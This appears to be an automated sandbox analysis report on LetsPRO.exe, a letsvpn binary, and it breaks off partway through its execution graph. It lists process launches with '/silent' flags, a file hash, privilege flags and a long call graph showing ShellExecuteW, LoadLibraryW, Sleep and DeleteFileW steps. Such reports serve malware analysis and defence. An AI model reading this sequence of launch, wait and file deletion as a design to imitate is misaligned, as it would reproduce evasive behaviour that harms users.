                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                  Start time:10:30:31
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                                                  Imagebase:0x200000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                  Start time:10:30:33
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" "/silent"
                                                                                                                                                                                                  Imagebase:0x4c0000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                  Start time:10:30:40
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                                                  Imagebase:0x500000
                                                                                                                                                                                                  File size:1'588'256 bytes
                                                                                                                                                                                                  MD5 hash:56162A01D3DE7CB90EB9A2222C6B8F24
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:7.1%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                    Signature Coverage:17.6%
                                                                                                                                                                                                    Total number of Nodes:1105
                                                                                                                                                                                                    Total number of Limit Nodes:21
                                                                                                                                                                                                    execution_graph 15833 180003102 ExitProcess 15834 180008644 15835 18000864e shared_ptr 15834->15835 15837 180008657 15835->15837 15838 180006940 GetSystemInfo 15835->15838 15839 18000696f GlobalMemoryStatusEx 15838->15839 15840 18000696b _setmbcp_nolock 15838->15840 15839->15840 15840->15837 15841 180012545 15842 1800125d4 15841->15842 15849 180012558 calloc 15841->15849 15843 18001693c _callnewh DecodePointer 15842->15843 15844 1800125d9 15843->15844 15845 180015dc8 _errno 5 API calls 15844->15845 15856 1800125c9 15845->15856 15848 1800125b9 15883 180015dc8 15848->15883 15849->15848 15850 180012570 15849->15850 15854 1800125be 15849->15854 15849->15856 15881 18001693c DecodePointer 15849->15881 15850->15849 15857 180019254 15850->15857 15866 1800192c8 15850->15866 15878 180010b34 15850->15878 15855 180015dc8 _errno 5 API calls 15854->15855 15855->15856 15886 180020d84 15857->15886 15860 180019271 15862 1800192c8 _NMSG_WRITE 9 API calls 15860->15862 15864 180019292 15860->15864 15861 180020d84 _set_error_mode 6 API calls 15861->15860 15863 180019288 15862->15863 15865 1800192c8 _NMSG_WRITE 9 API calls 15863->15865 15864->15850 15865->15864 15867 1800192fc _NMSG_WRITE 15866->15867 15868 180020d84 _set_error_mode 6 API calls 15867->15868 15877 18001938e _setmbcp_nolock _NMSG_WRITE _invoke_watson 15867->15877 15869 180019312 15868->15869 15870 180019438 GetStdHandle 15869->15870 15871 180020d84 _set_error_mode 6 API calls 15869->15871 15873 180019450 _NMSG_WRITE 15870->15873 15870->15877 15872 180019323 15871->15872 15872->15870 15875 180019334 15872->15875 15874 180019488 WriteFile 15873->15874 15874->15877 15876 180019369 GetModuleFileNameW 15875->15876 15875->15877 15876->15877 15877->15850 15897 180010af0 GetModuleHandleExW 15878->15897 15880 180010b41 ExitProcess 15882 180016957 15881->15882 15882->15849 15899 18001a380 15883->15899 15885 180015dd1 15885->15854 15887 180020d8c 15886->15887 15888 180015dc8 _errno 5 API calls 15887->15888 15889 180019262 15887->15889 15890 180020db1 15888->15890 15889->15860 15889->15861 15892 180016cfc 15890->15892 15895 180016c94 DecodePointer 15892->15895 15894 180016d15 15894->15889 15896 180016cd2 _invalid_parameter_noinfo _invoke_watson 15895->15896 15896->15894 15898 180010b10 _init_pointers 15897->15898 15898->15880 15900 18001a390 _commit 15899->15900 15912 1800157f0 15900->15912 15902 18001a39d 15903 180015060 _calloc_crt 5 API calls 15902->15903 15911 18001a3d6 __security_init_cookie _getptd_noexit 15902->15911 15904 18001a3b2 15903->15904 15905 18001580c _mtinit TlsSetValue 15904->15905 15904->15911 15906 18001a3c8 15905->15906 15907 18001a3e5 15906->15907 15908 18001a3cf 15906->15908 15910 180011058 free 5 API calls 15907->15910 15909 18001a404 _initptd LeaveCriticalSection 15908->15909 15909->15911 15910->15911 15911->15885 15913 180015803 TlsGetValue 15912->15913 15914 180015800 15912->15914 15915 18002a300 15913->15915 15914->15913 15916 18000ccc8 15917 18000ccd6 15916->15917 15918 18000ccf6 15916->15918 15917->15918 15919 18000ccdc SetFilePointer 15917->15919 15919->15918 15920 18000a40a 15921 18000a41d 15920->15921 15924 18000a413 _setmbcp_nolock 15920->15924 15922 18000a42b 15921->15922 15978 18000cdd4 15921->15978 15922->15924 15925 18000a441 15922->15925 15984 18000ceac 15922->15984 15926 18000a453 15925->15926 15988 18000cf08 15925->15988 15949 180009bbc 15926->15949 15930 18000a462 15931 18000a4ab wcscpy 15930->15931 15932 18000a46b 15930->15932 15933 18000a5cb 15931->15933 15935 18000a4f3 15931->15935 15938 18000a53e wsprintfW 15931->15938 15941 18000a56d wsprintfW 15931->15941 15945 18000a76f 15931->15945 15932->15924 15934 180009a9c 2 API calls 15932->15934 15933->15924 15939 18000a601 15933->15939 15992 18000eb24 15933->15992 15934->15924 15935->15938 15940 18000a58d 15938->15940 15943 18000a62c WriteFile 15939->15943 15946 18000a666 SetFileTime 15939->15946 15947 18000a658 __termconin 15939->15947 15974 18000d334 15939->15974 15968 180009a9c 15940->15968 15941->15940 15943->15939 15943->15947 15944 18000a599 CreateFileW 15944->15933 15946->15947 15948 18000cdd4 5 API calls 15947->15948 15948->15924 15950 180009c02 15949->15950 15951 180009c26 type_info::operator== _setmbcp_nolock _fwrite_nolock 15949->15951 15950->15951 15952 18000cdd4 5 API calls 15950->15952 15953 180009c19 15950->15953 15951->15930 15952->15953 15953->15951 15954 180009c89 15953->15954 15955 18000ceac SetFilePointer 15953->15955 15956 180009c9c 15954->15956 15957 18000cf08 SetFilePointer 15954->15957 15955->15954 16002 18000ce60 15956->16002 15957->15954 15961 180009cdb 15961->15951 16008 18000cc4c 15961->16008 15964 18000eb24 std::ios_base::_Init 8 API calls 15965 180009d14 _mbstowcs_l_helper wcscpy wcsstr 15964->15965 15965->15951 16012 18000a918 SystemTimeToFileTime 15965->16012 15967 180009ec0 LocalFileTimeToFileTime 15967->15951 15969 180009ae0 _fwrite_nolock 15968->15969 15970 180009b5a wcscat wcscpy 15969->15970 15971 180009b91 _setmbcp_nolock 15969->15971 15972 180009b74 GetFileAttributesW 15970->15972 15971->15944 15972->15971 15973 180009b84 CreateDirectoryW 15972->15973 15973->15971 15976 18000d35e 15974->15976 15975 18000cc4c SetFilePointer 15975->15976 15976->15975 15977 18000d366 15976->15977 15977->15939 15979 18000cded 15978->15979 15981 18000cdf4 15978->15981 15979->15922 15980 18000ce23 15983 180011058 free 5 API calls 15980->15983 15981->15979 15981->15980 16022 180011058 15981->16022 15983->15979 15985 18000cec5 15984->15985 15986 18000cec0 15984->15986 15987 18000d780 SetFilePointer 15985->15987 15986->15925 15987->15986 15989 18000cf1c 15988->15989 15990 18000cf21 15988->15990 15989->15925 15990->15989 15991 18000d780 SetFilePointer 15990->15991 15991->15989 15994 18000eb2f 15992->15994 15993 18000eb48 15993->15939 15994->15993 15995 18001693c _callnewh DecodePointer 15994->15995 15996 18000eb4e std::_Xbad_alloc 15994->15996 15995->15994 16027 180011998 15996->16027 15998 18000eb8c 16032 180015060 15998->16032 16001 18000ebc2 16001->15939 16014 18000d780 16002->16014 16004 180009cc4 16005 18000d5bc 16004->16005 16006 18000cc4c SetFilePointer 16005->16006 16007 18000d5fc 16006->16007 16007->15961 16009 18000cc58 16008->16009 16011 180009cfb 16008->16011 16010 18000cc7f SetFilePointer 16009->16010 16009->16011 16010->16011 16011->15951 16011->15964 16013 18000a9ab _setmbcp_nolock 16012->16013 16013->15967 16015 18000d7b5 16014->16015 16021 18000d7ad 16014->16021 16016 18000cc4c SetFilePointer 16015->16016 16017 18000d7c6 16016->16017 16018 18000cc4c SetFilePointer 16017->16018 16019 18000d9c5 16017->16019 16018->16019 16020 18000cc4c SetFilePointer 16019->16020 16019->16021 16020->16021 16021->16004 16023 18001105d HeapFree 16022->16023 16025 18001107d free _commit 16022->16025 16024 180011078 16023->16024 16023->16025 16026 180015dc8 _errno 4 API calls 16024->16026 16025->15980 16026->16025 16028 1800119e1 16027->16028 16029 1800119f7 RtlPcToFileHeader 16027->16029 16028->16029 16030 180011a37 RaiseException 16029->16030 16031 180011a1c 16029->16031 16030->15998 16031->16030 16035 180015085 16032->16035 16034 18000eba3 EncodePointer 16034->16001 16035->16034 16036 18001cb6c 16035->16036 16037 18001cb81 16036->16037 16038 18001cb9e calloc 16036->16038 16037->16038 16039 18001cb8f 16037->16039 16041 18001cb94 16038->16041 16042 18001693c _callnewh DecodePointer 16038->16042 16040 180015dc8 _errno 5 API calls 16039->16040 16040->16041 16041->16035 16042->16038 16043 180009aca GetFileAttributesW 16044 180009ad5 CreateDirectoryW 16043->16044 16045 180009ae0 _fwrite_nolock 16043->16045 16044->16045 16046 180009b5a wcscat wcscpy 16045->16046 16047 180009b91 _setmbcp_nolock 16045->16047 16048 180009b74 GetFileAttributesW 16046->16048 16048->16047 16049 180009b84 CreateDirectoryW 16048->16049 16049->16047 16050 180001170 LoadLibraryA 16051 18000a171 16052 18000a177 wcscat 16051->16052 16053 18000a191 SetFilePointer 16052->16053 16054 18000a1ab 16052->16054 16053->16054 16056 18000a1a4 16053->16056 16058 18000ca80 16054->16058 16057 18000a1be 16056->16057 16059 18000cabf 16058->16059 16066 18000cab1 16058->16066 16060 18000cb0f SetFilePointer 16059->16060 16061 18000cb32 16059->16061 16062 18000cad8 CreateFileW 16059->16062 16060->16061 16064 18000eb24 std::ios_base::_Init 8 API calls 16061->16064 16062->16060 16062->16066 16065 18000cb3c 16064->16065 16065->16066 16067 18000cb80 SetFilePointer 16065->16067 16066->16057 16067->16066 16068 18001f2b6 16069 18001f2ba 16068->16069 16071 18001f2c2 16068->16071 16070 18001f26f 16069->16070 16069->16071 16073 180015dc8 _errno 5 API calls 16070->16073 16087 18001eea0 16071->16087 16075 18001f27b 16073->16075 16078 18001f82b 16075->16078 16079 180016cfc _invalid_parameter_noinfo DecodePointer 16075->16079 16076 18001f412 GetConsoleMode 16077 18001f427 16076->16077 16085 18001f470 _ftelli64_nolock _mbstowcs_l_helper _commit 16076->16085 16080 18001f42d ReadConsoleW 16077->16080 16077->16085 16079->16078 16081 18001f45b _commit 16080->16081 16080->16085 16095 180015d78 16081->16095 16083 18001f468 16083->16078 16084 180011058 free 5 API calls 16083->16084 16084->16078 16086 180015d78 _dosmaperr 5 API calls 16085->16086 16086->16083 16088 18001eeb6 16087->16088 16089 18001eea9 16087->16089 16091 180015dc8 _errno 5 API calls 16088->16091 16092 18001eeae 16088->16092 16090 180015dc8 _errno 5 API calls 16089->16090 16090->16092 16093 18001eeed 16091->16093 16092->16076 16092->16085 16094 180016cfc _invalid_parameter_noinfo DecodePointer 16093->16094 16094->16092 16096 18001a380 _getptd_noexit 5 API calls 16095->16096 16097 180015d89 16096->16097 16098 18001a380 _getptd_noexit 5 API calls 16097->16098 16099 180015da2 free 16098->16099 16099->16083 16100 18000583a 16101 180005846 16100->16101 16208 180002028 16101->16208 16104 180005b94 16218 1800018e4 16104->16218 16106 180005c20 LoadLibraryW 16224 18002a158 16106->16224 16108 180005ca1 ShellExecuteW LoadLibraryW 16110 18002a158 _init_pointers 16108->16110 16111 180005d5b Sleep DeleteFileW 16110->16111 16112 180005d91 16111->16112 16114 180002f78 9 API calls 16112->16114 16115 180005dab 16114->16115 16116 180003b3c 11 API calls 16115->16116 16117 180005dba 16116->16117 16118 1800016d0 9 API calls 16117->16118 16119 180005dce 16118->16119 16120 1800015f4 9 API calls 16119->16120 16124 180005de1 16120->16124 16122 180005937 16122->16104 16225 180005394 16122->16225 16243 1800014c4 16122->16243 16247 18000151c 16122->16247 16251 180001220 16122->16251 16259 180001a20 16122->16259 16125 180005e6a CreateDirectoryW 16124->16125 16126 180005eb1 16125->16126 16127 180002f78 9 API calls 16126->16127 16128 180005ecb 16127->16128 16129 180001808 9 API calls 16128->16129 16130 180005ee8 16129->16130 16131 1800015f4 9 API calls 16130->16131 16132 180005efb 16131->16132 16133 1800016d0 9 API calls 16132->16133 16134 180005f12 16133->16134 16135 180006b28 23 API calls 16134->16135 16136 180005fc4 Sleep 16135->16136 16137 180005ff8 _NMSG_WRITE 16136->16137 16138 180005638 9 API calls 16137->16138 16139 180006014 16138->16139 16140 180003e68 11 API calls 16139->16140 16141 180006029 16140->16141 16142 180001808 9 API calls 16141->16142 16143 1800060b6 16142->16143 16144 1800016d0 9 API calls 16143->16144 16145 1800060cd 16144->16145 16146 1800018e4 9 API calls 16145->16146 16147 18000612c 16146->16147 16148 180001808 9 API calls 16147->16148 16149 18000616f 16148->16149 16150 180001808 9 API calls 16149->16150 16151 18000618a 16150->16151 16152 180001808 9 API calls 16151->16152 16153 1800061a5 16152->16153 16154 180001808 9 API calls 16153->16154 16155 1800061c0 16154->16155 16156 180001808 9 API calls 16155->16156 16157 18000620b 16156->16157 16158 1800016d0 9 API calls 16157->16158 16159 180006222 16158->16159 16160 1800018e4 9 API calls 16159->16160 16162 1800062a1 16160->16162 16161 180003b3c 11 API calls 16163 180006399 16161->16163 16162->16161 16164 1800016d0 9 API calls 16163->16164 16165 1800063b0 16164->16165 16166 1800016d0 9 API calls 16165->16166 16167 1800063c7 16166->16167 16168 180003b3c 11 API calls 16167->16168 16169 180006427 16168->16169 16170 1800016d0 9 API calls 16169->16170 16171 18000643e 16170->16171 16172 1800016d0 9 API calls 16171->16172 16173 180006455 16172->16173 16174 180003b3c 11 API calls 16173->16174 16175 1800064a9 16174->16175 16176 18000547c std::system_error::system_error 9 API calls 16175->16176 16177 1800064f1 16176->16177 16178 180005540 9 API calls 16177->16178 16179 180006525 16178->16179 16180 180005540 9 API calls 16179->16180 16181 180006549 16180->16181 16182 180003d20 11 API calls 16181->16182 16183 180006561 Sleep ShellExecuteW Sleep 16182->16183 16184 18000661e _NMSG_WRITE 16183->16184 16185 180005638 9 API calls 16184->16185 16186 180006645 _NMSG_WRITE 16185->16186 16187 180005638 9 API calls 16186->16187 16188 180006697 16187->16188 16189 180005638 9 API calls 16188->16189 16190 1800066bb 16189->16190 16191 180002270 9 API calls 16190->16191 16192 1800066cf 16191->16192 16193 18000310c 23 API calls 16192->16193 16194 1800066ea Sleep 16193->16194 16195 180002270 9 API calls 16194->16195 16196 18000672b 16195->16196 16197 180002270 9 API calls 16196->16197 16198 18000673d 16197->16198 16199 180002270 9 API calls 16198->16199 16200 18000674c 16199->16200 16201 180002270 9 API calls 16200->16201 16202 180006771 16201->16202 16203 18000310c 23 API calls 16202->16203 16204 180006783 DeleteFileW DeleteFileW DeleteFileW 16203->16204 16205 1800067e9 16204->16205 16206 18000286c 9 API calls 16205->16206 16207 1800068dd std::ios_base::_Ios_base_dtor _setmbcp_nolock 16206->16207 16209 18000205e 16208->16209 16267 180007e68 16209->16267 16211 1800020b7 16274 18000215c 16211->16274 16213 1800020e3 std::ios_base::_Init 16279 180008668 16213->16279 16215 180002119 16216 180002143 16215->16216 16285 1800069ac 16215->16285 16216->16122 16220 18000192c _NMSG_WRITE 16218->16220 16219 180001959 _NMSG_WRITE 16936 180005280 16219->16936 16220->16219 16944 180004660 16220->16944 16223 180001992 16223->16106 16226 180005461 16225->16226 16227 1800053be 16225->16227 16962 18000e13c 16226->16962 16228 1800053f9 16227->16228 16229 1800053cd 16227->16229 16233 180004594 std::_System_error::_System_error 9 API calls 16228->16233 16231 1800053db 16229->16231 16232 18000546d 16229->16232 16957 18000772c 16231->16957 16234 18000e13c std::_System_error::_System_error 8 API calls 16232->16234 16238 1800053f7 _fwrite_nolock 16233->16238 16239 18000547a 16234->16239 16236 1800054e5 16237 180004594 std::_System_error::_System_error 9 API calls 16236->16237 16241 1800054e3 _fwrite_nolock 16237->16241 16238->16122 16239->16236 16240 1800054c0 16239->16240 16242 180005394 std::_System_error::_System_error 9 API calls 16240->16242 16241->16122 16242->16241 16244 1800014e6 _NMSG_WRITE 16243->16244 16967 180008090 16244->16967 16246 1800014fe std::_System_error::_System_error 16246->16122 16248 180001564 _NMSG_WRITE 16247->16248 16249 180004594 std::_System_error::_System_error 9 API calls 16248->16249 16250 180001591 _NMSG_WRITE 16248->16250 16249->16250 16250->16122 16252 180001262 16251->16252 17003 180002560 16252->17003 16254 1800013e5 16257 1800013f9 16254->16257 17007 180004c20 16254->17007 16256 1800069ac std::ios_base::_Init 12 API calls 16256->16254 16257->16122 16260 180001a4b std::ios_base::getloc 16259->16260 16261 180001e28 25 API calls 16260->16261 16262 180001a54 16261->16262 17019 180008d60 16262->17019 16265 180007a80 12 API calls 16266 180001a97 16265->16266 16266->16122 16306 1800048e0 16267->16306 16269 180007e8f std::ios_base::getloc 16313 180001e28 16269->16313 16271 180007eae 16272 180007efa std::ios_base::_Addstd 16271->16272 16273 1800069ac std::ios_base::_Init 12 API calls 16271->16273 16272->16211 16273->16272 16275 18000eb24 std::ios_base::_Init 8 API calls 16274->16275 16276 18000217d 16275->16276 16277 18000e574 std::locale::_Init 9 API calls 16276->16277 16278 18000218c 16276->16278 16277->16278 16278->16213 16280 18000868a 16279->16280 16284 1800086c3 16279->16284 16618 18000ea80 16280->16618 16282 180008697 std::ios_base::_Init 16282->16284 16626 180001cf8 16282->16626 16284->16215 16286 1800069c2 16285->16286 16287 1800069f4 16285->16287 16288 1800069c7 16286->16288 16290 180011998 _CxxThrowException 2 API calls 16286->16290 16287->16216 16289 1800069da 16288->16289 16872 18000261c 16288->16872 16291 1800069f2 16289->16291 16293 18000261c std::system_error::system_error 9 API calls 16289->16293 16290->16288 16296 18000261c std::system_error::system_error 9 API calls 16291->16296 16295 180006a4c 16293->16295 16294 180006a24 16297 180011998 _CxxThrowException 2 API calls 16294->16297 16298 180011998 _CxxThrowException 2 API calls 16295->16298 16299 180006a74 16296->16299 16297->16289 16298->16291 16300 180011998 _CxxThrowException 2 API calls 16299->16300 16301 180006a8f 16300->16301 16303 180006ab6 std::ios_base::_Init 16301->16303 16878 180004250 16301->16878 16304 180006b13 16303->16304 16305 1800069ac std::ios_base::_Init 12 API calls 16303->16305 16304->16216 16305->16304 16307 1800069ac std::ios_base::_Init 12 API calls 16306->16307 16308 180004923 16307->16308 16309 18000eb24 std::ios_base::_Init 8 API calls 16308->16309 16310 18000492d 16309->16310 16311 18000493c 16310->16311 16323 18000e574 16310->16323 16311->16269 16315 180001e4e std::_Lockit::_Lockit std::locale::_Init 16313->16315 16314 180001ee4 std::locale::_Init 16314->16271 16315->16314 16347 1800044b0 16315->16347 16318 180001f1e 16360 18000e538 16318->16360 16322 180011998 _CxxThrowException 2 API calls 16322->16318 16324 18000e597 std::_Lockit::_Lockit 16323->16324 16326 18000e5cd std::locale::_Init 16324->16326 16331 18000e71c 16324->16331 16326->16311 16332 18000eb24 std::ios_base::_Init 8 API calls 16331->16332 16333 18000e733 16332->16333 16334 18000e5ab 16333->16334 16335 18000e468 _Yarn 5 API calls 16333->16335 16336 18000e788 16334->16336 16335->16334 16337 18000e79a 16336->16337 16338 18000e5b6 16336->16338 16344 18000eab0 16337->16344 16340 18000e468 16338->16340 16341 18000e485 16340->16341 16343 18000e48f _fwrite_nolock 16340->16343 16342 180011058 free 5 API calls 16341->16342 16341->16343 16342->16343 16343->16326 16345 18000eae7 16344->16345 16346 18000eac0 EncodePointer 16344->16346 16346->16338 16348 180001ef6 16347->16348 16349 1800044e9 16347->16349 16348->16318 16357 18001176c 16348->16357 16349->16348 16350 18000eb24 std::ios_base::_Init 8 API calls 16349->16350 16351 1800044fa 16350->16351 16352 18000454f 16351->16352 16363 18000234c 16351->16363 16352->16348 16385 180002a5c 16352->16385 16358 180011798 std::exception::exception 6 API calls 16357->16358 16359 180001f0d 16358->16359 16359->16322 16361 18000eb24 std::ios_base::_Init 8 API calls 16360->16361 16362 18000e54b 16361->16362 16362->16314 16364 180002371 std::_Lockit::_Lockit 16363->16364 16370 1800023dd 16364->16370 16400 180011798 16364->16400 16369 180011998 _CxxThrowException 2 API calls 16369->16370 16403 18000e68c 16370->16403 16614 18000e6f8 16385->16614 16388 180002a78 16390 180002a8b 16388->16390 16391 180011058 free 5 API calls 16388->16391 16389 180011058 free 5 API calls 16389->16388 16392 180002a9e 16390->16392 16393 180011058 free 5 API calls 16390->16393 16391->16390 16394 180002ab1 16392->16394 16395 180011058 free 5 API calls 16392->16395 16393->16392 16396 180002ac4 16394->16396 16397 180011058 free 5 API calls 16394->16397 16395->16394 16398 180002ad7 16396->16398 16399 180011058 free 5 API calls 16396->16399 16397->16396 16399->16398 16410 1800118a0 16400->16410 16423 180015264 16403->16423 16405 18000e6a5 16406 18000e468 _Yarn 5 API calls 16405->16406 16407 18000e6bf 16406->16407 16408 180015264 setlocale 22 API calls 16407->16408 16409 18000e6ce 16407->16409 16408->16409 16411 1800023c0 16410->16411 16412 1800118a5 _NMSG_WRITE 16410->16412 16411->16369 16412->16411 16414 180018b90 16412->16414 16415 180018ba5 16414->16415 16416 180018b9b 16414->16416 16417 180015dc8 _errno 5 API calls 16415->16417 16416->16415 16421 180018bc1 16416->16421 16418 180018bad 16417->16418 16419 180016cfc _invalid_parameter_noinfo DecodePointer 16418->16419 16420 180018bb9 16419->16420 16420->16411 16421->16420 16422 180015dc8 _errno 5 API calls 16421->16422 16422->16418 16424 180015296 16423->16424 16438 180015306 _invoke_watson 16423->16438 16450 18001d8c0 16424->16450 16429 180011058 free 5 API calls 16430 180015346 16429->16430 16443 1800152cf _invoke_watson 16430->16443 16476 18001a35c 16430->16476 16431 180015060 _calloc_crt 5 API calls 16432 1800152c7 16431->16432 16435 18001d8c0 _Wcsftime 18 API calls 16432->16435 16432->16443 16437 1800152ee 16435->16437 16437->16438 16439 1800152fc 16437->16439 16453 18001c278 16438->16453 16440 180011058 free 5 API calls 16439->16440 16440->16443 16441 180015391 16442 18001dc10 _wcstombs_s_l 22 API calls 16441->16442 16441->16443 16444 1800153eb 16442->16444 16443->16405 16444->16443 16446 180011058 free 5 API calls 16444->16446 16448 18001543f 16444->16448 16445 180015471 16495 1800131e4 LeaveCriticalSection 16445->16495 16446->16448 16448->16445 16449 180011058 free 5 API calls 16448->16449 16449->16445 16496 18001d790 16450->16496 16454 18001c2b5 16453->16454 16455 18001c29e 16453->16455 16456 18001a35c _getptd 18 API calls 16454->16456 16457 180015dc8 _errno 5 API calls 16455->16457 16458 18001c2ba 16456->16458 16459 18001c2a3 16457->16459 16539 18001b814 16458->16539 16461 180016cfc _invalid_parameter_noinfo DecodePointer 16459->16461 16470 18001533b 16461->16470 16463 180015060 _calloc_crt 5 API calls 16464 18001c2dd _copytlocinfo_nolock 16463->16464 16464->16470 16551 1800131e4 LeaveCriticalSection 16464->16551 16470->16429 16477 18001a380 _getptd_noexit 5 API calls 16476->16477 16479 18001a367 16477->16479 16478 180015350 16481 18001dc10 16478->16481 16479->16478 16480 180010c94 _amsg_exit 18 API calls 16479->16480 16480->16478 16484 18001dc39 16481->16484 16482 18001dc8f 16483 180015dc8 _errno 5 API calls 16482->16483 16494 18001dc94 16483->16494 16484->16482 16485 18001dc63 16484->16485 16564 18001d8e0 16485->16564 16487 180016cfc _invalid_parameter_noinfo DecodePointer 16490 18001dc86 16487->16490 16488 18001dc73 16489 18001dc79 16488->16489 16492 18001dca4 16488->16492 16491 180015dc8 _errno 5 API calls 16489->16491 16490->16441 16491->16490 16492->16490 16493 180015dc8 _errno 5 API calls 16492->16493 16493->16494 16494->16487 16497 18001d7c0 16496->16497 16498 18001d7e2 16497->16498 16499 18001d7c5 16497->16499 16517 18001230c 16498->16517 16500 180015dc8 _errno 5 API calls 16499->16500 16502 18001d7d1 16500->16502 16504 180016cfc _invalid_parameter_noinfo DecodePointer 16502->16504 16503 18001d800 16505 18001d824 16503->16505 16506 18001d818 16503->16506 16512 1800152af 16504->16512 16523 18001d5b4 16505->16523 16507 180015dc8 _errno 5 API calls 16506->16507 16509 18001d81d 16507->16509 16513 180016cfc _invalid_parameter_noinfo DecodePointer 16509->16513 16510 18001d834 16511 18001d83a 16510->16511 16515 18001d84c 16510->16515 16514 180015dc8 _errno 5 API calls 16511->16514 16512->16431 16512->16438 16513->16512 16514->16512 16515->16512 16516 180015dc8 _errno 5 API calls 16515->16516 16516->16509 16518 180012322 16517->16518 16521 18001235c 16517->16521 16519 18001a35c _getptd 18 API calls 16518->16519 16520 180012327 16519->16520 16520->16521 16522 18001b814 __pctype_func 18 API calls 16520->16522 16521->16503 16522->16521 16524 18001d5e5 16523->16524 16525 18001d613 16524->16525 16526 18001d5fa 16524->16526 16533 18001d5ea _NMSG_WRITE 16524->16533 16528 18001230c _LocaleUpdate::_LocaleUpdate 18 API calls 16525->16528 16527 180015dc8 _errno 5 API calls 16526->16527 16529 18001d5ff 16527->16529 16530 18001d620 16528->16530 16531 180016cfc _invalid_parameter_noinfo DecodePointer 16529->16531 16532 18001d70d _mbstowcs_l_helper 16530->16532 16537 18001d62e _mbstowcs_l_helper _commit 16530->16537 16531->16533 16532->16533 16534 180015dc8 _errno 5 API calls 16532->16534 16533->16510 16534->16533 16535 18001d6cb _mbstowcs_l_helper 16535->16533 16536 180015dc8 _errno 5 API calls 16535->16536 16536->16533 16537->16533 16537->16535 16538 18001b9cc _isleadbyte_l 18 API calls 16537->16538 16538->16537 16540 18001b81f 16539->16540 16541 18001a35c _getptd 18 API calls 16539->16541 16542 18001b848 16540->16542 16543 18001b83a 16540->16543 16541->16540 16552 18001b88c 16542->16552 16544 18001a35c _getptd 18 API calls 16543->16544 16545 18001b83f 16544->16545 16548 18001b880 16545->16548 16557 180010c94 16545->16557 16548->16463 16553 18001b866 16552->16553 16554 18001b89e __addlocaleref 16552->16554 16553->16545 16556 1800131e4 LeaveCriticalSection 16553->16556 16554->16553 16555 18001b5d8 __freetlocinfo 5 API calls 16554->16555 16555->16553 16558 180019254 _FF_MSGBANNER 9 API calls 16557->16558 16559 180010ca1 16558->16559 16560 1800192c8 _NMSG_WRITE 9 API calls 16559->16560 16561 180010ca8 16560->16561 16562 180010e70 doexit 10 API calls 16561->16562 16563 180010cb9 16562->16563 16565 18001d920 16564->16565 16566 18001d931 16565->16566 16567 18001d94a 16565->16567 16576 18001d925 _setmbcp_nolock 16565->16576 16569 180015dc8 _errno 5 API calls 16566->16569 16568 18001230c _LocaleUpdate::_LocaleUpdate 18 API calls 16567->16568 16570 18001d956 16568->16570 16571 18001d936 16569->16571 16572 18001db40 16570->16572 16573 18001d95f 16570->16573 16574 180016cfc _invalid_parameter_noinfo DecodePointer 16571->16574 16575 18001db86 WideCharToMultiByte 16572->16575 16581 18001db4d 16572->16581 16578 18001da37 WideCharToMultiByte 16573->16578 16582 18001d96c 16573->16582 16583 18001d9bd WideCharToMultiByte 16573->16583 16574->16576 16577 18001da6b 16575->16577 16576->16488 16577->16576 16580 180015dc8 _errno 5 API calls 16577->16580 16578->16577 16587 18001da7e _commit 16578->16587 16580->16576 16581->16576 16584 180015dc8 _errno 5 API calls 16581->16584 16582->16576 16585 180015dc8 _errno 5 API calls 16582->16585 16583->16582 16584->16576 16585->16576 16586 18001daa0 WideCharToMultiByte 16586->16577 16586->16587 16587->16576 16587->16577 16587->16586 16615 18000e703 16614->16615 16616 180002a6a 16614->16616 16617 180015264 setlocale 22 API calls 16615->16617 16616->16388 16616->16389 16617->16616 16619 18000e984 16618->16619 16620 18000ea1a 16619->16620 16625 18000e9fa 16619->16625 16636 1800155f4 16619->16636 16621 1800155f4 _wfsopen 23 API calls 16620->16621 16620->16625 16623 18000ea3c 16621->16623 16623->16625 16653 180015580 16623->16653 16625->16282 16627 180001d1e std::_Lockit::_Lockit std::locale::_Init 16626->16627 16628 180001db4 std::locale::_Init 16627->16628 16864 1800043ec 16627->16864 16628->16284 16631 180001dee 16635 18000e538 std::_Facet_Register 8 API calls 16631->16635 16632 18001176c std::bad_exception::bad_exception 6 API calls 16633 180001ddd 16632->16633 16634 180011998 _CxxThrowException 2 API calls 16633->16634 16634->16631 16635->16628 16637 180015625 16636->16637 16638 18001563c 16636->16638 16639 180015dc8 _errno 5 API calls 16637->16639 16638->16637 16641 180015657 16638->16641 